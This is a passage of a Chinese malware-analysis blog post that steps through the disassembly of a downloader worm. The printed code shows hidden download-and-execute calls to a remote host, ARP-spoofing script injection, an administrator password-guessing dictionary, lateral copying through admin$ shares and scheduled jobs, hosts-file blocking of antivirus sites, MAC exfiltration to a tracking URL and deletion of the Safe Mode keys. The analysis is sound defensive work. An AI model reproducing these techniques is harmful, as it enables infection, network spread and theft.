00404371 |. 50 push eax ; |Path
00404372 |. FF15 68104000 call dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
00404378 |. 5F pop edi
00404379 |. 5E pop esi
0040437A |. 5D pop ebp
0040437B |. 5B pop ebx
0040437C |. 81C4 04010000 add esp, 104
00404382 \. C3 retn线程九:004045C7处
调用LoadLibrary加载Urlmon.dll,
0040463E |. 50 push eax ; /FileName = "urlmon.dll"
0040463F |. FF15 74104000 call dword ptr [<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
再调用GetProcAddress获取URLDownloadFileA函数的地址,
00404672 |. 50 push eax ; /ProcNameOrOrdinal = "URLDownloadToFileA"
00404673 |. FF35 6C744000 push dword ptr [40746C] ; |hModule = 75C60000 (urlmon)
00404679 |. FF15 70104000 call dword ptr [<&KERNEL32.GetProcAddress>] ; \GetProcAddress
然后是两个子函数调用004043B2和0043D5
004043B2:用URLDownloadFileA函数将"http://www.liuliangvip.cn/down/wincap.exe"地址处的wincap.exe下载到本地"C:\WINDOWS\system32\wincap.exe",然后调用WinExec隐蔽执行wincap.exe
004043B2 /$ 56 push esi ; unpacked.004023B8
004043B3 |. 6A 00 push 0
004043B5 |. BE 74614000 mov esi, 00406174 ; ASCII "C:\WINDOWS\system32\wincap.exe"
004043BA |. 6A 00 push 0
004043BC |. 56 push esi
004043BD |. 68 94184000 push 00401894 ; ASCII "http://www.liuliangvip.cn/down/wincap.exe"
004043C2 |. 6A 00 push 0
004043C4 |. FF15 88644000 call dword ptr [406488] ; urlmon.URLDownloadToFileA
004043CA |. 6A 00 push 0 ; /ShowState = SW_HIDE
004043CC |. 56 push esi ; |CmdLine = "C:\WINDOWS\system32\wincap.exe"
004043CD |. FF15 1C104000 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec
004043D3 |. 5E pop esi
004043D4 \. C3 retn
004043D5:用URLDownloadFileA函数将 "http://www.liuliangvip.cn/down/arp.exe"
地址处的arp.exe下载到本地"C:\WINDOWS\system32\arps.com"
004043D5 /$ 33C0 xor eax, eax
004043D7 |. 50 push eax
004043D8 |. 50 push eax
004043D9 |. 68 70604000 push 00406070 ; ASCII "C:\WINDOWS\system32\arps.com"
004043DE |. 68 90174000 push 00401790 ; ASCII "http://www.liuliangvip.cn/down/arp.exe"
004043E3 |. 50 push eax
004043E4 |. FF15 88644000 call dword ptr [406488] ; urlmon.URLDownloadToFileA
004043EA \. C3 retn
创建线程0040449C,获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象,由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗
004044F2 |. 68 80000000 push 80 ; /BufSize = 80 (128.)
004044F7 |. 50 push eax ; |Buffer
004044F8 |. FF15 74114000 call dword ptr [<&WS2_32.#57>] ; \gethostname获取主机的主机名
004044FE |. 8D85 ECFEFFFF lea eax, dword ptr [ebp-114]
00404504 50 push eax
00404505 FF15 70114000 call dword ptr [<&WS2_32.#52>] ; WS2_32.gethostbyname获取对应主机的信息
......
0040445F |. 68 98194000 push 00401998 ; /<%s> = "<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>"
00404464 |. F3:AB rep stos dword ptr es:[edi] ; |
00404466 |. FF75 08 push dword ptr [ebp+8] ; |<%s> = "127.0.0.2-127.0.0.255"
00404469 |. 66:AB stos word ptr es:[edi] ; |
0040446B |. AA stos byte ptr es:[edi] ; |
0040446C |. 8D85 00FFFFFF lea eax, dword ptr [ebp-100] ; |
00404472 |. 50 push eax ; |<%s> = "C:\WINDOWS\system32\arps.com"
00404473 |. 8D85 00FDFFFF lea eax, dword ptr [ebp-300] ; |
00404479 |. 68 60234000 push 00402360 ; |format = "%s -idx 0 -ip %s -port 80 -insert ""%s"""
0040447E |. 50 push eax ; |s
0040447F |. E8 661A0000 call <jmp.&MSVCRT.sprintf> ; \sprintf
00404484 |. 83C4 20 add esp, 20
00404487 |. 8D85 00FDFFFF lea eax, dword ptr [ebp-300]
0040448D |. 6A 00 push 0 ; /ShowState = SW_HIDE
0040448F |. 50 push eax ; |CmdLine = "C:\WINDOWS\system32\arps.com -idx 0 -ip 127.0.0.2-127.0.0.255 -port 80 -insert ""<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>"""
00404490 |. FF15 1C104000 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec
线程十:00404798处
以administrator为用户名,对局域网中其他机器进行密码猜解,病毒猜解的密码字典如下:woaini、baby、asdf、NULL、angel、asdfgh、1314520、5201314、caonima、88888、bbbbbb、
12345678、memory、abc123、qwerty、123456、password、enter、hack、xpuser、money、yeah、
Time、game、user、home、alex、guest、admin、test、administrator、movie、root、love等。然后调用0040475F和00404AAB子函数。
0040475F:调用WSAStartup
0040476E |. 50 push eax ; /pWSAData
0040476F |. 68 02020000 push 202 ; |RequestedVersion = 202 (2.2.)
00404774 |. FF15 7C114000 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
00404AAB:调用mpr.dll中的WNetAddConnection2函数创建同一个网络资源的连接,对密码进行猜解
00404B73 |. 53 push ebx ;0
00404B74 |. 895D E0 mov dword ptr [ebp-20], ebx
00404B77 |. FF75 0C push dword ptr [ebp+C] ; unpacked.004024F4可选的一个密码
00404B7A |. 895D E4 mov dword ptr [ebp-1C], ebx
00404B7D |. 897D E8 mov dword ptr [ebp-18], edi
00404B80 |. 8975 EC mov dword ptr [ebp-14], esi
00404B83 |. FF75 10 push dword ptr [ebp+10] ;Administrator用于连接的用户名
00404B86 |. 895D F8 mov dword ptr [ebp-8], ebx
00404B89 |. 895D F4 mov dword ptr [ebp-C], ebx
00404B8C |. 50 push eax ;NETRESOURCE结构
00404B8D |. FF55 FC call dword ptr [ebp-4] ;WNetAddConnection2的地址
主机往每个盘里复制hackshen.exe,然后调用WinExec隐蔽执行"at \\169.254.112.1 16:47 F:\hackshen.exe"这个命令将病毒文件复制到"169.254.112.1\admin$\hackshen.exe"
线程十一:00405513处
调用00405530子函数
00405530:GetWindowDirectoryA,将病毒文件复制到C:\WINDOWS\Tasks\绿化.bat"
004055AC |. 6A 00 push 0 ; /FailIfExists = FALSE
004055AE |. 8D8424 180100>lea eax, dword ptr [esp+118] ; |
004055B5 |. 53 push ebx ; |NewFileName => "C:\WINDOWS\Tasks\绿化.bat"
004055B6 |. 50 push eax |ExistingFileName = "C:\Documents and Settings\li\"中华吸血鬼2.2\unpacked.exe"
004055B7 |. FF15 64104000 call dword ptr [<&KERNEL32.CopyFileA>] ; \CopyFileA
00405530返回后,创建一个线程004055C8,搜索盘符,当盘符大于C时,跳到0040566C
00405617 |> /80BC35 FCFEFF>/cmp byte ptr [ebp+esi-104], 0
0040561F |. |75 3C |jnz short 0040565D
00405621 |. |8A8435 F9FEFF>|mov al, byte ptr [ebp+esi-107]
00405628 |. |68 64224000 |push 00402264 ; ASCII "A:"
0040562D |. |8845 FC |mov byte ptr [ebp-4], al
00405630 |. |8A8435 FAFEFF>|mov al, byte ptr [ebp+esi-106]
00405637 |. |8845 FD |mov byte ptr [ebp-3], al
0040563A |. |8D45 FC |lea eax, dword ptr [ebp-4]
0040563D |. |50 |push eax
0040563E |. |FFD7 |call edi
00405640 |. |85C0 |test eax, eax
00405642 |. |74 19 |je short 0040565D
00405644 |. |8D45 FC |lea eax, dword ptr [ebp-4]
00405647 |. |68 60224000 |push 00402260 ; ASCII "C:"
0040564C |. |50 |push eax
0040564D |. |FFD7 |call edi
0040564F |. |85C0 |test eax, eax
00405651 |. |74 0A |je short 0040565D
00405653 |. |8D45 FC |lea eax, dword ptr [ebp-4]
00405656 |. |50 |push eax
00405657 |. |E8 10000000 |call 0040566C
0040566C:调用ExpandEnvironmentString扩充环境字串,搜索盘中后缀名为:rar、zip、tgz、cab、tar的文件,调用WinExec执行"C:\Program Files\WinRAR\Rar.exe -ep a ""E:\test.rar"" C:\WINDOWS\Tasks\绿化.bat",将病毒文件加入到压缩文件中,当用户解压文件时,诱使用户点击绿化.bat执行病毒程序,真是陷阱多多,阴招不断。
线程十二:004050E1处
下载各种木马,
0040510F . BE D8274000 mov esi, 004027D8 ; ASCII "http://www.liuliangvip.cn/down/1.exe" ;木马程序
.....
00405211 . BE 78264000 mov esi, 00402678 ; ASCII "http://www.liuliangvip.cn/down/10.exe" ;木马程序
......
00405281 . BB 5C714000 mov ebx, 0040715C ; ASCII "C:\DOCUME~1\li\LOCALS~1\Temp\B3ipPrP5rd.pif" ;随机的文件名,有00404FAF产生
00405286 . BD 90010000 mov ebp, 190
0040528B > 8D8424 340900>lea eax, dword ptr [esp+934]
00405292 . 50 push eax
00405293 . E8 17FDFFFF call 00404FAF
{
......
00404FC1 |. 50 push eax ; /Buffer
00404FC2 |. 68 04010000 push 104 ; |BufSize = 104 (260.)
00404FC7 |. FF15 7C104000 call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA获取临时文件指定的路径
......
00404FE9 |. 6A 00 push 0 ; /timer = NULL
00404FEB |. AA stos byte ptr es:[edi] ; |
00404FEC |. E8 1D0F0000 call <jmp.&MSVCRT.time> ; \time
00404FF1 |. 50 push eax ; /seed
00404FF2 |. E8 110F0000 call <jmp.&MSVCRT.srand> ; \srand
00404FF7 |. 8065 F4 00 and byte ptr [ebp-C], 0
00404FFB |. 33C0 xor eax, eax
00404FFD |. 8D7D F5 lea edi, dword ptr [ebp-B]
00405000 |. 59 pop ecx
00405001 |. AB stos dword ptr es:[edi]
00405002 |. AB stos dword ptr es:[edi]
00405003 |. 59 pop ecx
00405004 |. 33F6 xor esi, esi
00405006 |. 66:AB stos word ptr es:[edi]
00405008 |> E8 F50E0000 /call <jmp.&MSVCRT.rand> ; [rand产生随机的文件名
......
004050CB |. 50 push eax ;"http://www.liuliangvip.cn/down/3.exe"
004050CC |. 83E1 03 and ecx, 3
004050CF |. FF75 08 push dword ptr [ebp+8] ;"C:\DOCUME~1\li\LOCALS~1\Temp\B3ipPrP5rd.pif"
004050D2 |. F3:A4 rep movs byte ptr es:[edi], byte ptr [esi>
004050D4 |. E8 FAFCFFFF call 00404DD3 ;下载木马程序并重命名为随机的文件名
{
......
00404E7E |. 8B1D 74104000 mov ebx, dword ptr [<&KERNEL32.LoadLibrar>; kernel32.LoadLibraryA
00404E84 |. 83C4 0C add esp, 0C
00404E87 |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410]
00404E8D |. 50 push eax ; /FileName=shell32.dll
00404E8E |. FFD3 call ebx ; \LoadLibraryA
......
00404EE4 |. 8B1D 70104000 mov ebx, dword ptr [<&KERNEL32.GetProcAdd>; kernel32.GetProcAddress
00404EEA |. 83C4 0C add esp, 0C
00404EED |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208]
00404EF3 |. 50 push eax ; /ProcNameOrOrdinal=ShellExecute
00404EF4 |. FF35 68744000 push dword ptr [407468] ; |hModule = NULL
00404EFA |. FFD3 call ebx ; \GetProcAddress
.......
00404F2A |. FF35 6C744000 push dword ptr [40746C] ; urlmon.75C60000
00404F30 |. FFD3 call ebx
......
00404F39 |. 51 push ecx
00404F3A |. 51 push ecx
00404F3B |. FF75 0C push dword ptr [ebp+C] ;ASCII "C:\DOCUME~1\li\LOCALS~1\Temp\bx7EoOJu0B.pif"
00404F3E |. FF75 08 push dword ptr [ebp+8] ;ASCII "http://www.liuliangvip.cn/down/3.exe"
00404F41 |. 51 push ecx
00404F42 FFD0 call eax ; urlmon.URLDownloadToFileA下载木马程序
}
}
线程十三:00405A85处
每隔10分钟到http://www.liuliangvip.cn/down/update.ini下载update.ini文件到"C:\WINDOWS\meupdate.ini"),并且和http://www.liuliangvip.cn/22.txt做比较,如果不同则下载"http://www.liuliangvip.cn/down/mm.exe"到c:\_default.pif更新病毒程序
00405AA8 68 C0270900 push 927C0 ;10分钟
00405AAD . FF15 AC104000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00405AB3 . 68 A01C4000 push 00401CA0 ; ASCII "http://www.liuliangvip.cn/down/mm.exe"
00405AB8 . E8 43FEFFFF call 00405900
{
00405900
......
00405A01 |. 57 push edi
00405A02 |. 57 push edi
00405A03 |. 51 push ecx ;ASCII "C:\WINDOWS\meupdate.ini"保存到本地文件名和地址
00405A04 |. 68 9C1B4000 push 00401B9C ; ASCII "http://www.liuliangvip.cn/down/update.ini"网站地址
00405A09 |. 57 push edi
00405A0A |. A3 04754000 mov dword ptr [407504], eax ; urlmon.URLDownloadToFileA
00405A0F FFD0 call eax
......
00405A28 |. 50 push eax ; /stream
00405A29 |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410] ; |
00405A2F |. 53 push ebx ; |n
00405A30 |. 50 push eax ; |s
00405A31 |. E8 DE040000 call <jmp.&MSVCRT.fgets> ; \fgets读出meupdate.ini文件
00405A36 |. 83C4 0C add esp, 0C
00405A39 |. BE BC284000 mov esi, 004028BC ; ASCII "2.1"
00405A3E |. 8D85 F0FBFFFF lea eax, dword ptr [ebp-410]
00405A44 |> 8A10 /mov dl, byte ptr [eax] ;文件前3个字符和"2.1"进行比较
00405A46 |. 8ACA |mov cl, dl
00405A48 |. 3A16 |cmp dl, byte ptr [esi]
00405A4A |. 75 1A |jnz short 00405A66 ;不相同则跳到00405A66更新病毒
......
00405A6F |. 57 push edi
00405A70 |. 57 push edi
00405A71 |. 68 A41D4000 push 00401DA4 ; ASCII "c:\_default.pif"
00405A76 |. FF75 08 push dword ptr [ebp+8] ;"http://www.liuliangvip.cn/down/mm.exe"
00405A79 |. 57 push edi
00405A7A |. FF15 04754000 call dword ptr [407504] ; urlmon.URLDownloadToFileA
}
00405ABD . 59 pop ecx
00405ABE . 6A 00 push 0 ; /ShowState = SW_HIDE
00405AC0 . 56 push esi ; |CmdLine
00405AC1 . FF15 1C104000 call dword ptr [<&KERNEL32.WinExec>] ; \WinExec
00405AC7 .^ EB DF jmp short 00405AA8
线程十四:00405AC9处
修改host文件,获得%programfiles%的环境变量,
00405AEC |. 68 FF000000 |push 0FF ; /DestSizeMax = FF (255.)
00405AF1 |. 50 |push eax ; |DestString
00405AF2 |. 68 AC284000 |push 004028AC ; |SrcString = "%ProgramFiles%"
00405AF7 |. FF15 80104000 |call dword ptr [<&KERNEL32.ExpandEnv>; \ExpandEnvironmentStringsA
将host文件属性设为normal
00405B25 |. 68 80000000 |push 80 ; /FileAttributes = NORMAL
...... ;获取host文件路径相关代码
00405B48 |. 50 |push eax ; |FileName = "C:\WINDOWS\system32\drivers\etc\hosts"
00405B49 |. F3:A4 |rep movs byte ptr es:[edi], byte pt>; |
00405B4B |. FF15 58104000 |call dword ptr [<&KERNEL32.SetFileAt>; \SetFileAttributesA
接着查找[url=file://\\drivers\etc\\hosts]\\drivers\etc\\hosts[/url]文件,写入如下数据:
127.0.0.0 360.qihoo.com
......
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
当每次输入上面的网址时,都会定向到127.0.0.1,屏蔽了安全厂商的网址。并且每秒执行一次,防止host文件被改回去。
线程十五:00405467处
搜集被感染主机的mac地址,并把被感染主机的mac地址和感染的病毒版本发送给"http://www.liuliangvip.cn/down/tj/ct.asp"页面
0040549B |. 68 70224000 push 00402270 ; /mode = "r"
...... ;路径相关代码
004054BE |. 50 push eax ; |path = "C:\WINDOWS\mfxixue.ini"
004054BF |. F3:A4 rep movs byte ptr es:[edi], byte ptr [esi>; |
004054C1 |. E8 120A0000 call <jmp.&MSVCRT.fopen> ; \fopen打开mfxixue.ini
......
004054CF |. 68 981A4000 push 00401A98 ; ASCII "http://www.liuliangvip.cn/down/tj/ct.asp"
004054D4 |. 6A 01 push 1
004054D6 |. E8 ACFEFFFF call 00405387
{
00405387 /$ 55 push ebp
......
00405392 |. 6A 00 push 0 ; /timer = NULL
00405394 |. E8 750B0000 call <jmp.&MSVCRT.time> ; \time
00405399 |. 50 push eax ; /seed
0040539A |. E8 690B0000 call <jmp.&MSVCRT.srand> ; \srand
0040539F |. 59 pop ecx
004053A0 |. 33F6 xor esi, esi
004053A2 |. 59 pop ecx
004053A3 |> E8 5A0B0000 /call <jmp.&MSVCRT.rand> ; [rand
......
004053ED |. 74 1C je short 0040540B
004053EF |. 68 28774000 push 00407728 ; /<%s> = "qi06AiQ0Cf"
004053F4 |. 8D85 FCFEFFFF lea eax, dword ptr [ebp-104] ; |
004053FA |. FF75 0C push dword ptr [ebp+C] ; |<%s> = "http://www.liuliangvip.cn/down/tj/ct.asp"
004053FD |. 68 30284000 push 00402830 ; |format = "%s?mac=%s&ver=2.1"
00405402 |. 50 push eax ; |s
00405403 |. E8 E20A0000 call <jmp.&MSVCRT.sprintf> ; \sprintf
00405408 |. 83C4 10 add esp, 10
0040540B |> 8D85 FCFEFFFF lea eax, dword ptr [ebp-104]
00405411 |. 50 push eax ;eax=0221FD9C, (ASCII "http://www.liuliangvip.cn/down/tj/ct.asp?mac=qi06AiQ0Cf&ver=2.1")
00405412 |. E8 03000000 call 0040541A
{
0040541A /$ 56 push esi
......
00405422 |. 68 28774000 push 00407728 ; ASCII "qi06AiQ0Cf"
00405427 |. FF15 64114000 call dword ptr [<&WININET.InternetOpenA>] ; WININET.InternetOpenA初始化应用程序,以使用 WinINet 函数
0040542D |. 8BF8 mov edi, eax
0040542F |. 3BFE cmp edi, esi
00405431 |. 74 2F je short 00405462
00405433 |. 56 push esi
00405434 |. 68 00000080 push 80000000
00405439 |. 56 push esi
0040543A |. 56 push esi
0040543B |. FF7424 1C push dword ptr [esp+1C];(ASCII "http://www.liuliangvip.cn/down/tj/ct.asp?mac=qi06AiQ0Cf&ver=2.1")
0040543F |. 57 push edi
00405440 |. FF15 60114000 call dword ptr [<&WININET.InternetOpenUrlA>; WININET.InternetOpenUrlA通过一个完整的HTTP网址打开一个资源
00405446 |. 3BC6 cmp eax, esi
00405448 |. 74 11 je short 0040545B
0040544A |. 8B35 68114000 mov esi, dword ptr [<&WININET.InternetClo>; WININET.InternetCloseHandle
......
}
00405417 |. 59 pop ecx
00405418 |. C9 leave
00405419 \. C3 retn
}
扫尾
删除两个跟安全模式有关的注册表项:"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal","SYSTEM\CurrentControlSet\Control\SafeBoot\Network",当用户想进入安全模式清楚病毒时,进不了安全模式,这招也很毒。
至此,病毒的全部行为都已经分析完了,病毒的行为真多,要彻底清除该病毒是一件大工程!分析过程中遇到了一些困难,但还是一一解决了,通过分析完这个病毒,收获颇丰,感受到了病毒作者的智慧。由于篇幅关系,没有给出该病毒的专杀,可能会在之后继续完善。
PS:此文章出自DragonLtx,其实之前也分析过类似的下载者,功能上也差不太多,也逆向过一部分相关代码,待整理好再发一篇此分析的姊妹篇,通过C实现相关功能吧。
193
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
